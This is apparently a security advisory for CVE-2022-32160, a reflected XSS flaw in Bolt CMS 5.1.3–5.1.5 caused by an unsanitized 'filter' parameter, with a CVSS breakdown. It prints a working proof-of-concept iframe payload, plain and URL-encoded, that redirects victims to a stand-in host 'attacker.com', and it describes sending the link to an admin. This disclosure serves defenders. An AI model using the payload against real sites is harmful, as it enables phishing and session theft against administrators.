We found results for “”
CVE-2022-32160
Date: May 31, 2022
Overview
In bolt v5.1.3 and v5.1.5 are vulnerable against reflected XSS as a result of an unsanitized ‘filter’ parameter that allows the injection of a malicious javascript into the page. An attacker can redirect Admins into malicious websites or steal confidential information.Details
In bolt v5.1.3 and v5.1.5 are vulnerable against reflected XSSPoC Details
Login to the application with a low-privileged user. Enter the following payload into the search bar.Press Enter. You will be redirected to “http://attacker.com/” . Copy this URL and send it to an Admin. The Admin will be redirected as well.
http://bolt_app.com/bolt/?filter=%3Ciframe+src%3D%22javascript%3Awindow.top.location.replace%28%27http%3A%2F%2Fattacker.com%2F%27%29%22%3B%3E%3C%2Fiframe%3E
PoC Code
<iframe src="javascript:window.top.location.replace('http://attacker.com/')";></iframe>
Affected Environments
Bolt CMS versions 5.1.3 through 5.1.5Prevention
There is not fix yetLanguage: PHP
Good to know:
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | Required |
Scope (S): | Changed |
Confidentiality (C): | Low |
Integrity (I): | Low |
Availability (A): | None |